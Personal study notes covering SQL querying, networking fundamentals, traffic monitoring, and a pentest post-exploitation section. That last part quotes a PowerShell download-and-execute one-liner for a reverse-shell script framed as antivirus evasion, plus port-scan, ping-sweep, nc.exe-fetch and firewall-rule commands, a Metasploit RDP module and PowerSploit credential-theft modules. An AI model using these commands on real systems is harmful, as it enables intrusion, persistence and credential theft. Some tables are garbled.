if the column contains alphabetic characters it orders the records from the beginning of the alphabet to the end.

SELECT customerid, city, country
FROM customers
ORDER BY city;

Sorting in descending order

You can also use the ORDER BY with the DESC keyword to sort in descending order. The DESC keyword is short for "descending" and tells SQL to sort numbers from largest to smallest, or alphabetically from Z to A. This can be done by following ORDER BY with the DESC keyword.

SELECT customerid, city, country
FROM customers
ORDER BY city DESC;

Sorting based on multiple columns

You can also choose multiple columns to order by. For example, you might first choose the country and then the city column. SQL then sorts the output by country, and for rows with the same country, it sorts them based on city.

WHERE

To create a filter in SQL, you need to use the keyword WHERE. WHERE indicates the condition for a filter. We can use the equals sign (=) operator to set this condition.

SELECT firstname, lastname, title, email
FROM employees
WHERE title = 'IT Staff';

Filtering for patterns

You can also filter based on a pattern. you can identify entries that start or end with a certain character or characters. Filtering for a pattern requires incorporating two more elements into your WHERE clause:

a wildcard
the LIKE operator

Wildcards

A wildcard is a special character that can be substituted with any other character. Two of the most useful wildcards are the percentage sign (%) and the underscore (_):

The percentage sign substitutes for any number of other characters.
The underscore symbol only substitutes for one other character. These wildcards can be placed after a string, before a string, or in both locations depending on the pattern you’re filtering for. The following table includes these wildcards applied to the string 'a' and examples of what each pattern would return.

| Pattern | Results that could be returned | | ----------- | ---------------------------------- | | 'a%' | apple123, art, a | | 'a_' | as, an, a7 | | 'a__' | ant, add, a1c | | '%a' | pizza, Z6ra, a | | '_a' | ma, 1a, Ha | | '%a%' | Again, back, a | | 'a' | Car, ban, ea7 |

LIKE

To apply wildcards to the filter, you need to use the LIKE operator instead of an equals sign (=). LIKE is used with WHERE to search for a pattern in a column.

SELECT lastname, firstname, title, email
FROM employees
WHERE title LIKE 'IT%';

Comparison operators

In SQL, filtering numeric and date and time data often involves operators. You can use the following operators in your filters to make sure you return only the rows you need:

| operator | use | | ------------ | ------------------------ | | < | less than | | > | greater than | | = | equal to | | <= | less than or equal to | | >= | greater than or equal to | | <> | not equal to |

Note: You can also use != as an alternative operator for not equal to. These comparison operators are used in the WHERE clause at the end of a query.

SELECT firstname, lastname, birthdate
FROM employees
WHERE birthdate > '1970-01-01';

This query returns the first and last names of employees born after, but not on, '1970-01-01' (or January 1, 1970). If you were to use the >= operator instead, the results would also include results on exactly '1970-01-01'. ie, the > operator is exclusive and the >= operator is inclusive.

BETWEEN

Another operator used for numeric data as well as date and time data is the BETWEEN operator. BETWEEN filters for numbers or dates within a range. For example, if you want to find the first and last names of all employees hired between January 1, 2002 and January 1, 2003, you can use the BETWEEN operator as follows:

SELECT firstname, lastname, hiredate
FROM employees
WHERE hiredate BETWEEN '2002-01-01' AND '2003-01-01';

Note: The BETWEEN operator is inclusive.

Logical operators

AND

AND is used to filter on two conditions. AND specifies that both conditions must be met simultaneously.

SELECT firstname, lastname, email, country, supportrepid
FROM customers
WHERE supportrepid = 5 AND country = 'USA';

OR

The OR operator also connects two conditions, but OR specifies that either condition can be met. It returns results where the first condition, the second condition, or both are met.

SELECT firstname, lastname, email, country
FROM customers
WHERE country = 'Canada' OR country = 'USA';

NOT

Unlike the previous two operators, the NOT operator only works on a single condition, and not on multiple ones. The NOT operator negates a condition. This means that SQL returns all records that don’t match the condition specified in the query.

SELECT firstname, lastname, email, country
FROM customers
WHERE NOT country = 'USA';

Another way of finding values that are not equal to a certain value is by using the <> operator or the != operator. For example, WHERE country <> 'USA' and WHERE country != 'USA' are the same filters as WHERE NOT country = 'USA'.

Combining logical operators

Logical operators can be combined in filters.

SELECT firstname, lastname, email, country
FROM customers
WHERE NOT country = 'Canada' AND NOT country = 'USA';

JOIN

to join data from multiple tables when these tables share a common column.

Inner joins

The first type of join that you might perform is an inner join. INNER JOIN returns rows matching on a specified column that exists in more than one table.

It only returns the rows where there is a match, but like other types of joins, it returns all specified columns from all joined tables. For example, if the query joins two tables with SELECT * , all columns in both of the tables are returned. Note: If a column exists in both of the tables, it is returned twice when SELECT * is used.

The syntax of an inner join

To write a query using INNER JOIN, you can use the following syntax:

SELECT *
FROM employees
INNER JOIN machines ON employees.device_id = machines.device_id;

You must specify the two tables to join by including the first or left table after FROM and the second or right table after INNER JOIN. After the name of the right table, use the ON keyword and the = operator to indicate the column you are joining the tables on. It's important that you specify both the table and column names in this portion of the join by placing a period (.) between the table and the column. In addition to selecting all columns, you can select only certain columns. For example, if you only want the join to return the username, operating_system and device_id columns, you can write this query:

SELECT username, operating_system, employees.device_id
FROM  employees
INNER JOIN machines ON employees.device_id = machines.device_id;

Note: In the example query, username and operating_system only appear in one of the two tables, so they are written with just the column name. On the other hand, because device_id appears in both tables, it's necessary to indicate which one to return by specifying both the table and column name (employees.device_id).

Outer joins

Outer joins expand what is returned from a join. Each type of outer join returns all rows from either one table or both tables.

Left joins

When joining two tables, LEFT JOIN returns all the records of the first table, but only returns rows of the second table that match on a specified column. ![[attachments/SQL-img-202512081114.png|931]] The syntax for using LEFT JOIN is demonstrated in the following query:

SELECT *
FROM employees
LEFT JOIN machines ON employees.device_id = machines.device_id;

As with all joins, you should specify the first or left table as the table that comes after FROM and the second or right table as the table that comes after LEFT JOIN. In the example query, because employees is the left table, all of its records are returned. Only records that match on the device_id column are returned from the right table, machines.

Right joins

When joining two tables, RIGHT JOIN returns all of the records of the second table, but only returns rows from the first table that match on a specified column. ![[attachments/SQL-img-202512081114-1.png|935]] The following query demonstrates the syntax for RIGHT JOIN:

SELECT *
FROM employees
RIGHT JOIN machines ON employees.device_id = machines.device_id;

RIGHT JOIN has the same syntax as LEFT JOIN, with the only difference being the keyword RIGHT JOIN instructs SQL to produce different output. The query returns all records from machines, which is the second or right table. Only matching records are returned from employees, which is the first or left table. Note: You can use LEFT JOIN and RIGHT JOIN and return the exact same results if you use the tables in reverse order. The following RIGHT JOIN query returns the exact same result as the LEFT JOIN query demonstrated in the previous section:

SELECT *
FROM machines
RIGHT JOIN employees ON employees.device_id = machines.device_id;

All that you have to do is switch the order of the tables that appear before and after the keyword used for the join, and you will have swapped the left and right tables.

Full outer joins

FULL OUTER JOIN returns all records from both tables. You can think of it as a way of completely merging two tables. ![[attachments/SQL-img-202512081114-2.png]] You can review the syntax for using FULL OUTER JOIN in the following query:

SELECT *
FROM employees
FULL OUTER JOIN machines ON employees.device_id = machines.device_id;

The results of a FULL OUTER JOIN query include all records from both tables. Similar to INNER JOIN, the order of tables does not change the results of the query.

Aggregate functions

In SQL, aggregate functions are functions that perform a calculation over multiple data points and return the result of the calculation. The actual data is not returned. There are various aggregate functions that perform different calculations:

COUNT returns a single number that represents the number of rows returned from your query.
AVG returns a single number that represents the average of the numerical data in a column.
SUM returns a single number that represents the sum of the numerical data in a column.

Aggregate function syntax

To use an aggregate function, place the keyword for it after the SELECT keyword, and then in parentheses, indicate the column you want to perform the calculation on. For example, when working with the customers table, you can use aggregate functions to summarize important information about the table. If you want to find out how many customers there are in total, you can use the COUNT function on any column, and SQL will return the total number of records, excluding NULL values. You can run this query and explore its output:

SELECT COUNT(firstname)
FROM customers;

The result is a table with one column titled COUNT(firstname) and one row that indicates the count. If you want to find the number of customers from a specific country, you can add a filter to your query:

SELECT COUNT(firstname)
FROM customers
WHERE country = 'USA';

With this filter, the count is lower because it only includes the records where the country column contains a value of 'USA'. There are a lot of other aggregate functions in SQL. The syntax of placing them after SELECT is exactly the same as the COUNT function.

[Vault: Root] Networking

Mon, 08 Dec 2025 08:56:33 GMT

Network

A network is a group of connected devices Two types of networks:

LAN: A local area network, or LAN, spans a small area like an office building, a school, or a home.
WAN: A wide area network or WAN spans a large geographical area like a city, state, or country.

Common devices that make up a network

Hub: a network device that broadcasts information to every device on the network.
Switch: A switch makes connections between specific devices on a network by sending and receiving data between them. A switch is more intelligent than a hub. It only passes data to the intended destination. This makes switches more secure than hubs, and enables them to control the flow of traffic and improve network performance.
Router: a network device that connects multiple networks together.
Modem: a device that connects your router to the internet, and brings internet access to the LAN. ![[attachments/Network-img-202510091530.png|724x300]]
Firewall is a security device that monitors incoming and outgoing traffic on your network.
Wireless access point: sends and receives digital signals over radio waves creating a wireless network. Devices with wireless adapters connect to the access point using Wi-Fi. Wi-Fi refers to a set of standards that are used by network devices to communicate wirelessly.

Cloud networks

Cloud computing is the practice of using remote servers, applications, and network services that are hosted on the internet instead of on local physical devices. A cloud network is a collection of servers or computers that stores resources and data in a remote data center that can be accessed via the internet. A cloud service provider (CSP) is a company that offers cloud computing services. These companies own large data centers in locations around the globe that house millions of servers. Data centers provide technology services, such as storage, and compute at such a large scale that they can sell their services to other companies for a fee. Companies can pay for the storage and services they need and consume them through the CSP’s application programming interface (API) or web console. CSPs provide three main categories of services:

Software as a service (SaaS) refers to software suites operated by the CSP that a company can use remotely without hosting the software.
Infrastructure as a service (IaaS) refers to the use of virtual computer components offered by the CSP. These include virtual containers and storage that are configured remotely through the CSP’s API or web console. Cloud-compute and storage services can be used to operate existing applications and other technology workloads without significant modifications. Existing applications can be modified to take advantage of the availability, performance, and security features that are unique to cloud provider services.
Platform as a service (PaaS) refers to tools that application developers can use to design custom applications for their company. Custom applications are designed and accessed in the cloud and used for a company’s specific business needs. ![[attachments/Network-img-202510091530-1.png|732x294]]

Software-defined networks

CSPs offer networking tools similar to the physical devices that you have learned about in this section of the course. Next, you’ll review software-defined networking in the cloud. Software-defined networks (SDNs) are made up of virtual network devices and services. Just like CSPs provide virtual computers, many SDNs also provide virtual switches, routers, firewalls, and more. Most modern network hardware devices also support network virtualization and software-defined networking. This means that physical switches and routers use software to perform packet routing. In the case of cloud networking, the SDN tools are hosted on servers located at the CSP’s data center.

Benefits of cloud computing and software-defined networks

Reliability

Reliability in cloud computing is based on how available cloud services and resources are, how secure connections are, and how often the services are effectively running. Cloud computing allows employees and customers to access the resources they need consistently and with minimal interruption.

Cost

Traditionally, companies have had to provide their own network infrastructure, at least for internet connections. This meant there could be potentially significant upfront costs for companies. However, because CSPs have such large data centers, they are able to offer virtual devices and services at a fraction of the cost required for companies to install, patch, upgrade, and manage the components and software themselves.

Scalability

Another challenge that companies face with traditional computing is scalability. When organizations experience an increase in their business needs, they might be forced to buy more equipment and software to keep up. But what if business decreases shortly after? They might no longer have the business to justify the cost incurred by the upgraded components. CSPs reduce this risk by making it easy to consume services in an elastic utility model as needed. This means that companies only pay for what they need when they need it.

Network Communication

Data packet: a basic unit of information that travels from one device to another within a network.
- When data is sent from one device to another across a network, it is sent as a packet that contains information about where the packet is going, where it's coming from, and the content of the message.
- It contains a header that includes the internet protocol address, the IP address, and the media access control, or MAC, address of the destination device. It also includes a protocol number that tells the receiving device what to do with the information in the packet. Then there's the body of the packet, which contains the message that needs to be transmitted to the receiving device. Finally, at the end of the packet, there's a footer, similar to a signature on a letter, the footer signals to the receiving device that the packet is finished.
Bandwidth: The amount of data a device receives every second
Speed: The rate at which data packets are received or downloaded
Packet sniffing: The practice of capturing and inspecting data packets across a network

[Vault: Networking] Network Traffic Monitoring and Analysis

Mon, 08 Dec 2025 08:56:33 GMT

Network monitoring is essential in maintaining situational awareness of any activity on a network. By collecting and analyzing network traffic, organizations can detect suspicious network activity.

Network Traffic Analysis (NTA) is a process that encompasses capturing, inspecting, and analyzing data as it flows in a network. Its goal is to have complete visibility and understand what is communicated inside and outside the network.

Generally, we will use network traffic analysis to:

Monitor network performance
Check for abnormalities in the network. E.g., sudden performance peaks, slow network, etc
Inspect the content of suspicious communication internally and externally. E.g., exfiltration via DNS, download of a malicious ZIP file over HTTP, lateral movement, etc From a SOC perspective, network traffic analysis helps:
Detecting suspicious or malicious activity
Reconstructing attacks during incident response
Verifying and validating alerts

Sources

Intermediary Sources
These are devices through which traffic mostly passes. While they generate some traffic, it is significantly lower than what endpoint devices generate. Under this category, we can find firewalls, switches, web proxies, IDS, IPS, routers, access points, wireless LAN controllers, and many more. Maybe less relevant for us, but all the infrastructure of Internet Service Providers is also considered part of this category.

The traffic that originates from these devices comes from services like routing protocols (EIGRP, OSPF, BGP), management protocols (SNMP, PING), logging protocols (SYSLOG), and other supporting protocols (ARP, STP, DHCP).

Endpoint Sources
These are devices where traffic originates and ends. Endpoint devices take the bulk of the network bandwidth. Devices that fall under this category are servers, hosts, IoT devices, printers, virtual machines, cloud resources, mobile phones, tablets, and many more

Flow

A network traffic flow is typically determined by the services available in the network, such as Active Directory, SMB, HTTPS, and so on. In a typical corporate network, we can group these flows into North-South and East-West traffic. North-South Traffic
NS traffic is often monitored closely as it flows from the LAN to the WAN and vice versa. The most well-known services in this category are client-server protocols like HTTPS, DNS, SSH, VPN, SMTP, RDP, and many more. Each of these protocols has two streams: ingress (inbound) and egress (outbound). All of this traffic passes the firewall in one way or another. Configuring firewall rules and logging properly are key to visibility. East-West Traffic
EW traffic stays within the corporate LAN, so it is often monitored less. However, it is important to keep track of these flows. When the network is compromised, an attacker will often exploit different services internally to move laterally within the network. As we see below, there are many services within this category.

Directory, Authentication & Identity Services
- Kerberos / LDAP: Authentication/queries to Active Directory
- RADIUS / TACACS+: Network access control
- Certificate Authority issuing internal certifications
File shares & print services
- SMB/CIFS: Accessing network drives
- IPP/LPD: Printing over the network
Router, switching, and infrastructure services
- DHCP traffic between hosts and the DHCP server
- ARP broadcast messages
- Internal DNS
- Routing protocol messages
Application Communication
- Database Connections: SQL over TCP
- Microservices APIs: REST or gRPC calls between services
Backup & Replication
- File Replication: Between data centers or to backup servers
- Database Replication: MySQL binlog replication, PostgreSQL streaming, and more
Monitoring & Management
- SNMP: Device health metrics
- Syslog: Centralized logging
- NetFlow/IPFIX: Traffic flow telemetry
- Other endpoint logs sent to a central logging server

Logs

Logs are our first entry into acquiring information about what is going on in the network. Each system and protocol in the network includes a way of logging information. It is essential to know that there is no universal standard for implementing logging on each system and protocol. Each vendor chooses how to implement logging for themselves. For example, Microsoft implements Windows Event Logs. Also, the data that is logged is up to the vendor. Most vendors will not log a full packet as it enters or exits the system. They will log some fields that they deem useful, such as a source IP address and a destination IP address.

Full Packet Capture

Network Tap
A network tap is a physical device you place inline in your network. These devices create a copy of all the network traffic that passes without affecting performance. That copied data is then forwarded to a packet capture box, IDS, or other system using the dedicated monitoring port. It is interesting to know that a TAP operates only on the link layer of the TCP-IP model; it does not need a MAC or IP address, because it copies the electrical/light signals and sends them to its monitoring port. This way, there is no added delay to the network. Port Mirroring
Port mirroring is a software approach to copying packets from one port on an intermediary device to another that is attached to, for example, an IDS, packet capture box, or other systems. Each vendor has its own name. Cisco, for example, calls it SPAN.

Network Statistics

Another great way to find anomalies in your network is to gather metadata about the data flowing through the network, such as counting the number of DNS requests that a host sends out. A few protocols facilitate this. NetFlow is a protocol developed by Cisco that collects metadata about traffic flowing in a network. It is a great way to detect things like C2 traffic, data exfiltration, and lateral movement The Internet Protocol Flow Information Export protocol (IPFIX) can be considered as the successor to NetFlow. NetFlow was initially a proprietary protocol from Cisco. This means that the protocol was designed for Cisco systems only. Only from NetFlow v9 on did Cisco include templating, so other vendors could adapt it to their devices. In collaboration with Cisco and other vendors, the IETF created IPFIX and released it as a vendor-neutral standard. It offers features similar to NetFlow, but includes more flexibility in configuring which fields to capture.

Packet payload information

Network packets contain components related to the transmission of the packet. This includes details like source and destination IP address, and the packet payload information, which is the actual data that’s transmitted. Often, this data is encrypted and requires decryption for it to be readable. Organizations can monitor the payload information of packets to uncover unusual activity, such as sensitive data transmitting outside of the network, which could indicate a possible data exfiltration attack.

Temporal patterns

Network packets contain information relating to time. This information is useful in understanding time patterns. For example, a company operating in North America experiences bulk traffic flows between 9 a.m. to 5 p.m., which is the baseline of normal network activity. If large volumes of traffic are suddenly outside of the normal hours of network activity, then this is considered off baseline and should be investigated.

If you would like to learn more about network components organizations can monitor, check out network traffic - MITRE ATT&CK®
Attackers can leverage different techniques to exfiltrate data, should you like to learn more, check out data exfiltration techniques - MITRE ATT&CK®

[Vault: Offensive Security] Post Exploitation Techniques

Mon, 08 Dec 2025 08:56:33 GMT

During a penetration testing engagement, after you exploit a vulnerability and compromise a system, you may perform additional activities to move laterally and pivot through other processes, applications, or systems to demonstrate how they could be compromised and how information could be exfiltrated from the organization. You may also maintain persistence by creating backdoors, creating new users, scheduling jobs and tasks, and communicating with a [[Command and Control (C2) Utilities|Command and Control (C2) Utilities]] to launch further attacks. At the end of your engagement, you should erase any evidence that you were in a compromised system by erasing logs and any other data that could allow detection.

Attackers don’t always rely on one-time exploits; instead, they often aim to maintain long-term access to compromised networks, especially if they can reach sensitive databases or file systems. With persistent access, they can carry out a range of malicious activities over time, such as slowly exfiltrating data. To avoid detection, they may split stolen files into small pieces and hide them in DNS queries, allowing them to quietly extract data over weeks or even months. There are many techniques attackers use to maintain a presence in a network, and it’s important to understand how they establish persistence and what actions they can take once inside. Demonstrating persistent access to exploited devices can highlight how slowly some organizations detect these threats, emphasizing the need for stronger detection and response capabilities.

Maintaining Persistence

After the exploitation phase, you need to maintain a foothold in a compromised system to perform additional tasks, such as installing and/or modifying services to connect back to the compromised system. You can maintain the persistence of a compromised system in a number of ways, including the following:

Creating a bind or [[Reverse shell]]
Creating and manipulating scheduled jobs and tasksIf you would like to learn more about network components organizations can monitor, check out network traffic - MITRE ATT&CK®

Attackers can leverage different techniques to exfiltrate data, should you like to learn more, check out data exfiltration techniques - MITRE ATT&CK®

Creating custom daemons and processes
Creating new users
Creating additional backdoors

When you maintain persistence in a compromised system, you can take several actions, such as the following:

Uploading additional tools
Using local system tools
Performing ARP scans and ping sweeps
Conducting DNS and directory services enumeration
Launching brute-force attacks
Performing additional enumeration of users, groups, forests, sensitive data, and unencrypted files
Performing system manipulation using management protocols (for example, WinRM, WMI, SMB, SNMP) and compromised credentials
Executing additional exploits

You can also take several actions through the compromised system, including the following:

Configuring port forwarding
Creating SSH tunnels or proxies to communicate to the internal network
Using a VPN to access the internal network

[[Command and Control (C2) Utilities|Command and Control (C2) Utilities]]

[[Reverse shell]]

Scheduled Jobs and Tasks

Windows has a command that attackers can use to schedule automated execution of tasks on a local or remote computer. You can use this functionality for post-exploitation and persistence. You can take advantage of the Windows Task Scheduler to bypass User Account Control (UAC) if the user has access to its graphical interface. This is possible because the security option runs with the system’s highest privileges. When a Windows user creates a new task, the system typically doesn’t require the user to authenticate with an administrator account.

You can access the scheduled tasks of a Windows system by navigating to Start -> Administrative Tools -> Task Scheduler. Alternatively, you can press the Windows key+R to open the Run dialog box and then type taskschd.msc and press Enter.

Scheduled tasks can also be used to steal data over time without raising alarms. In Windows, Task Scheduler can be leveraged to schedule jobs that may use a significant amount of CPU resources and network bandwidth. This is helpful when huge files are to be compressed and transferred over a network (especially if you set them to execute at night or during weekends, when no users will be on the victim’s system).

Custom Daemons, Processes, and Additional Backdoors

Much as with scheduled tasks, you can create your own custom daemons (services) and processes on a victim system, as well as additional backdoors. Whenever possible, a backdoor must survive reboots to maintain persistence on the victim’s system. You can ensure this by creating daemons that are automatically started at bootup. These daemons can persist on the system to either further compromise other systems (lateral movement) or exfiltrate data.

New Users

After you compromise a system, if you obtain administrator (root) access to the system, you can create additional accounts. These accounts can be used to connect to and interact with the victim system. Just as it is a best practice when configuring user accounts under normal circumstances, you (as an attacker) should create those alternate accounts with complex passwords.

Perform Lateral Movement, Detection Avoidance, and Enumeration

Lateral movement (also referred to as pivoting) is a post-exploitation technique that can be performed using many different methods. The main goal of lateral movement is to move from one device to another to avoid detection, steal sensitive data, and maintain access to the devices to exfiltrate the sensitive data, which is data whose theft would have a severe impact to an organization. Such data typically should not be broadly shared internally or externally. Access to sensitive data should be limited and tightly controlled. Data exfiltration is the act of deliberately moving sensitive data from inside an organization to outside an organization’s perimeter without permission. In this section, you will learn the most common techniques for lateral movement.

NOTE Pass-the-hash is an example of a post-exploitation technique that can be used to move laterally and compromise other systems in the network. Because password hashes cannot be reversed, instead of trying to figure out what the user’s password is, an attacker can just use a password hash collected from a compromised system and then use the same hash to log in to another client or server system.

Post-Exploitation Scanning

Lateral movement involves scanning a network for other systems, exploiting vulnerabilities in other systems, compromising credentials, and collecting sensitive information for exfiltration. Lateral movement is possible if an organization does not segment its network properly. Network segmentation is therefore very important.

NOTE Testing the effectiveness of your network segmentation strategy is very important. Your organization might have deployed virtual or physical firewalls, virtual local area networks (VLANs), or access control policies for segmentation, or it might use microsegmentation in virtualized and containerized environments. You should perform network segmentation testing often to verify that your segmentation strategy is appropriate to protect your network against lateral movement and other post-exploitation attacks.

After compromising a system, you can use basic port scans to identify systems or services of interest that you can further attack in an attempt to compromise valuable information. You can scan for SMB shares that you may be able to log in to with compromised credentials or that the logged-in user of the compromised system may have access to. You can move files to or from other systems. Alternatively, you can instantiate an SMB share (via Samba or similar mechanisms) and copy files from a compromised system.

You can use remote access protocols, including the following, to communicate with a compromised system:

Microsoft’s Remote Desktop Protocol (RDP)
Apple Remote Desktop
VNC
X server forwarding

Using [[Metasploit]] to create an RDP connection. This Metasploit module enables RDP and provides options to create an account and configure it to be a member of the Local Administrators and Remote Desktop Users group. This module can also be used to forward the target’s TCP port 3389.

msf > use post/windows/manage/enable_rdp
msf post(windows/manage/enable_rdp) > show options
Module options (post/windows/manage/enable_rdp):
   Name    Current Setting Required Description
   ----    --------------- -------- -----------
   ENABLE  true              no       Enable the RDP Service and
                                        Firewall Exception.
   FORWARD false            no       Forward remote port 3389 to local
                                        Port.
   LPORT    3389             no       Local port to forward remote
                                        connection.
   PASSWORD                  no       Password for the user created.
   SESSION                   yes      The session to run this module
                                        on.
  USERNAME                   no       The username of the user to
                                        create.
 meterpreter > run

Remote Desktop’s main advantage over other tools, like Sysinternals, is that it gives you a full, interactive graphical user interface (GUI) of the remote compromised computer. From the remote connection, it is possible to steal data or collect screenshots, disable security software, or install malware. Remote Desktop connections are fully encrypted, and monitoring systems cannot see what you are doing in the remote system. The main disadvantage of Remote Desktop is that a user working on the compromised remote system may be able to detect that you are logged on to the system. A common practice is to use Remote Desktop when no users are on the compromised system or when compromising a server.

Legitimate Utilities and Living-off-the-Land

Many different legitimate Windows legitimate utilities, such as PowerShell, Windows Management Instrumentation (WMI), and Sysinternals, can be used for post-exploitation activities. Similarly, you can use legitimate tools and installed applications in Linux and macOS systems to perform post-exploitation activities. If a compromised system has Python installed, for example, you can use it for additional exploitation and exfiltration. Similarly, you can use the Bash shell and tools like Netcat post-exploitation.

Using legitimate tools to perform post-exploitation activities is often referred to as living-off-the-land and, in some cases, as fileless malware. The term fileless malware refers to the idea that there is no need to install any additional software or binaries to the compromised system. Examples of living-off-the-land post-exploitation techniques include the following:

PowerShell for Post-Exploitation Tasks
PowerSploit and Empire
BloodHound
Windows Management Instrumentation for Post-Exploitation Tasks
Sysinternals and PsExec
Windows Remote Management (WinRM) for Post-Exploitation Tasks

PowerShell for Post-Exploitation Tasks

You can use PowerShell to get directory listings, copy and move files, get a list of running processes, and perform administrative tasks. Table 8- 4 lists and describes some of the most useful PowerShell commands that can be used for post-exploitation tasks. Useful PowerShell Commands for Post-Exploitation Tasks

| PowerShell Command | Description | | ----------------------------------------------------------------------------------------------------------------------------------------------- | -------------------------------------------------------------------------- | | Get-ChildItem | Lists directories | | Copy-Item sourceFile.doc destinationFile.doc | Copies a file (cp,copy,cpi) | | Move-Item sourceFile.doc destinationFile.doc | Moves a file (mv,move,mi) | | Select-String -path c:\users \*.txt -pattern password | Finds text within a file | | Get-Content omar_s_passwords.txt | Prints the contents of a file | | Get-Location | Gets the present directory | | Get-Process | Gets a process listing | | Get-Service | Gets a service listing | | Get-Process \| Export-Csv procs.csv | Exports output to a comma-separated values (CSV) file | | 1..255 \| % {echo "10.1.2.$$_"; ping -n 1 -w 100 10.1.2$_ \| SelectString ttl} | Launches a ping sweep to the 10.1.2.0/24 network | | 1..1024 \| % {echo ((new-object Net.Sockets.TcpClient).Connect("10.1.2.3",$_)) "Port $_ is open!"} 2>$null | Launches a port scan to the 10.1.2.3 host (scans for ports 1 through 1024) | | (New-Object System.Net.WebClient).DownloadFile ("[http://10.1.2.3/nc.exe](https://www.google.com/search?q=http://10.1.2.3/nc.exe)", "nc.exe") | Fetches a file via HTTP (similar to the wget Linux command) | | Get-HotFix | Obtains a list of all installed hotfixes | | cd HKLM:\ ls | Navigates the Windows registry | | Get-NetFirewallRule -all New-NetFirewallRule -Action Allow -DisplayName LetMeIn - RemoteAddress 10.6.6.6 | Lists and modifies the Windows firewall rules | | Get-Command | Gets a list of all available commands |

The following PowerShell command can be used to avoid detection by security products and antivirus software: PS > IEX (New-Object Net.WebClient).DownloadString('http:// /Invoke-PowerShellTcp.ps1') This command directly loads a PS1 file from the Internet instead of downloading it and then executes it on the device.

Remote management in Windows via PowerShell (often called PowerShell [PS] remoting ) is a basic feature that a system administrator can use to access and manage a system remotely. An attacker could also take advantage of this feature to perform post-exploitation activities. https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/enable-psremoting

PowerSploit

PowerSploit is a collection of PowerShell modules that can be used for post-exploitation and other phases of an assessment. Popular PowerSploit modules and scripts

| Module/Script | ------------------------------ | Invoke-DllInjection | Invoke-ReflectivePE Injection | Invoke-Shellcode2 | Invoke-WmiCommand4 | Out-EncodedCommand | Out-CompressedDll | Out-EncryptedScript | Remove-Comments | New-UserPersistence Option | New-ElevatedPersistence | Add-Persistence | Install-SSP | Get-SecurityPackages | Find-AVSignature | Invoke-TokenManipulation | Invoke-Credential Injection | Invoke-NinjaCopy2 | Invoke-Mimikatz4 | Get-Keystrokes | Get-GPPassword | Get-GPPAutoLogon | Get-TimedScreenshot | New-VolumeShadowCopy | Get-VolumeShadowCopy | Mount-VolumeShadowCopy | Remove-VolumeShadowCopy | Get-VaultCredential | Out-Minidump | Get-MicrophoneAudio | Set-MasterBootRecord | Set-CriticalProcess | PowerUp | Invoke-Portscan | Get-HttpStatus2 | Invoke-ReverseDnsLookup4 | PowerVi6ew Refer to Add-Persistence function | | Option | Configures elevated persistence options for the Add-Persistence function | | | Adds persistence capabilities to a script | | | Installs a security support provider (SSP) DLL | | | Enumerates all loaded security packages | | | Locates single-byte AV signatures, using the same method as Dsplit from "class101" | | | Lists available logon tokens, creates processes with other users' logon tokens, and impersonates logon tokens in the current thread | | | Creates logons with plaintext credentials without triggering a suspicious event ID 4648 (Explicit Credential Logon)1 | | | Copies a file from an NTFS-partitioned volume by reading the raw volume and parsing the NTFS structures3 | | | Reflectively loads Mimikatz 2.0 in memory using PowerShel5l and can be used to dump credentials without writing anything to disk as well as for any functionality provided with Mimikatz | | | Logs keys pressed, time, and the active window | | | Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences | | | Retrieves the autologon username and password from registry.xml if pushed through Group Policy Preferences | | | Takes screenshots at regular intervals and saves them to a folder | | | Creates a new volume shadow copy | | | Lists the device paths of all local volume shadow copies | | | Mounts a volume shadow copy | | | Deletes a volume shadow copy | | | Displays Windows vault credential objects, including plaintext web credentials | | | Generates a full-memory minidump of a process | | | Records audio from the system microphone and saves to disk | | | Overwrites the master boot record with the message of your choice | | | Causes your machine to blue screen upon exiting PowerShell | | | Acts as a clearinghouse of common privilege escalation checks, along with some weaponization vectors | | | Does a simple TCP port scan using regular sockets, based rather loosely on Nmap1 | | | Returns the HTTP status codes and full URL for specified paths when provided with a dictionary file3 | | | Scans an IP address range for DNS PTR records5 | | | Performs network and Windows domain enumeration and exploitation | | href="https://github.com/PowerShellMafia/PowerSploit">https://github.com/PowerShellMafia/PowerSploit for a complete and up-to-date list of scripts.

When you use PowerSploit, you typically expose the scripts launching a web service. PowerSploit scripts are located in /usr/share/windows-resources/powersploit. A simple web service is started using the command sudo python3 -m http.server 1337 (where 1337 is the port number). The compromised system then connects to the attacker’s machine (Kali) on port 1337 and downloads a PowerSploit script for data exfiltration.

Empire

Another PowerShell-based post-exploitation framework is Empire, which is an open-source framework that includes a PowerShell Windows agent and a Python Linux agent. Empire implements the ability to run PowerShell agents without the need for powershell.exe. It allows you to rapidly deploy post-exploitation modules including keyloggers, bind shells, reverse shells, Mimikatz, and adaptable communications to evade detection. You can download Empire from https://github.com/EmpireProject/Empire.

BloodHound

You can use a single-page JavaScript web application called BloodHound that uses graph theory to reveal the hidden relationships in a Windows Active Directory environment. An attacker can use BloodHound to identify numerous attack paths. Similarly, incident response teams can use BloodHound to detect and eliminate those same attack paths. You can download BloodHound from the following GitHub repository: https://github.com/BloodHoundAD/Bloodhound.

NOTE You can also use BloodHound to find complex attack paths in Microsoft Azure.

Windows Management Instrumentation (WMI) for Post-Exploitation Tasks

Windows Management Instrumentation (WMI) is used to manage data and operations on Windows operating systems. You can write WMI scripts or applications to automate administrative tasks on remote computers. WMI also provides functionality for data management to other parts of the operating system, including the System Center Operations Manager (formerly Microsoft Operations Manager [MOM]) and Windows Remote Management (WinRM). Malware can use WMI to perform different activities in a compromised system. For example, the Nyeta ransomware used WMI to perform administrative tasks.

NOTE WMI can also be used to perform many data-gathering operations. Pen testers therefore use WMI as a quick system-enumerating tool.

Sysinternals and PsExec

Sysinternals is a suite of tools that allows administrators to control Windows-based computers from a remote terminal. You can use Sysinternals to upload, execute, and interact with executables on compromised hosts. The entire suite works from a command-line interface and can be scripted. By using Sysinternals, you can run commands that can reveal information about running processes, and you can kill or stop services. Penetration testers commonly use the following Sysinternals tools post-exploitation:

PsExec: Executes processes
PsFile: Shows open files
PsGetSid: Displays security identifiers of users
PsInfo: Gives detailed information about a computer
PsKill: Kills processes
PsList: Lists information about processes
PsLoggedOn: Lists logged-in accounts
PsLogList: Pulls event logs
PsPassword: Changes passwords
PsPing: Starts ping requests
PsService: Makes changes to Windows services
PsShutdown: Shuts down a computer
PsSuspend: Suspends processes

